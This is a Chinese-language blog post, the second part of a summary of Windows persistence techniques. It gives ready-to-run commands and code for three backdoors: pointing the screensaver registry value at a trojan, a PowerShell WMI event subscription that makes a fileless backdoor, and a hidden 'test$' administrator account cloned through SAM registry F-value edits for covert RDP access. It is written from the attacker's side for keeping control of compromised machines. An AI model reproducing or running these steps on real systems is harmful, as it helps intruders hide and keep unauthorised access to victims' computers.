干货 | 最全Windows权限维持总结（下）

Delina

原文链接：干货 | 最全Windows权限维持总结
​
0x11 屏幕保护程序
利用前提:对方开启了屏幕保护
屏幕保护程序，当初的设计是为了防止长期屏幕的显示，预防老化与缩短屏幕显示器老化的一种保护程序。
在对方开启屏幕保护的情况下，我们可以修改屏保程序为我们的恶意程序从而达到后门持久化的目的，攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。
注册表位置:

• 
  

HKEY_CURRENT_USER\Control Panel\Desktop
命令行修改:

• 
  

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /d C:\Windows\System32\cmd.exe
​
​
这里可以改成我们的马,达到维持权限的效果,具体时间为注册表的ScreenSaverTimeout值有关
0x12 WMI构造无文件后门
WMI是一项Windows管理技术，其全称是Windows Management Instrumentation，即Windows管理规范。大多数基于Windows的软件依赖于此服务。
无文件无进程使得他非常隐蔽成为后门，但由于他的隐蔽性现在被大多数杀软所查杀。
通过与Powershell命令配合使用可以实现无文件，具有良好的隐蔽性也是目前较为常用的持久化手段。
如果展开讲会讲很久，这里推荐一篇比较详细的文章:
​

1. https://wooyun.js.org/drops/WMI%20%E7%9A%84%E6%94%BB%E5%87%BB%EF%BC%8C%E9%98%B2%E5%BE%A1%E4%B8%8E%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E4%B9%8B%E6%94%BB%E5%87%BB%E7%AF%87.html
   
2. 
   
3. $filterName = 'SD'
   
4. $consumerName = 'SDD'
   
5. $exePath = 'C:\Windows\System32\cmd.exe'
   
6. $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=200 AND TargetInstance.SystemUpTime < 320"
   
7. $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
   
8. $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
   
9. Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

复制代码

​
可以使用Autoruns进行查看
​
0x13 影子用户
影子用户即创建的隐藏用户，它无法通过普通命令进行查询，比较隐蔽。
这里以win10作为演示
们先利用命令创建一个隐藏用户,并将其加入本地管理员组。
​

1. net user test$ 123456 /add
   
2. net localgroup administrators test$ /add

复制代码

​
​
net user无法查看
​
但是可以在计算机管理和登陆页面中看到
​
​
解决办法:
打开注册表:
HKEY_LOCAL_MACHINE\SAM\SAM
修改权限:
​
​
修改完权限之后，我们重新启动注册表即可继续查看内容。
查看F值
​
导出这三个值
​
test$导出为1.reg
000003EC包含test$用户的F值，导出另存为2.reg
000003E9包含WIN10用户的F值，导出另存为3.reg
​
将2.reg中的F值替换为3.reg中的F值，即将test$用户的F值替换为WIN10用户的F值
​
删除test$

• 
  

net user test$ /del
​
注册表就已经无法打开了
​
导入注册表
​

1. regedit /s 1.reg
   
2. regedit /s 2.reg

复制代码

​
查看效果
​
但登录界面已经没有账户
​
3389直接登录,以test$账号登录
但是登陆之后的身份却是原来WIN10用户，桌面也是原用户的，达到克隆效果。
​
总结
一边复现一边写,发现很多都需要权限，或者说如果有更高的权限能做的事更加的多,包括很多操作现在已经被各种终端设备监控,所以维权实际上是建立在免杀和提权之后的。我总结的可能不太全面,欢迎补充。
​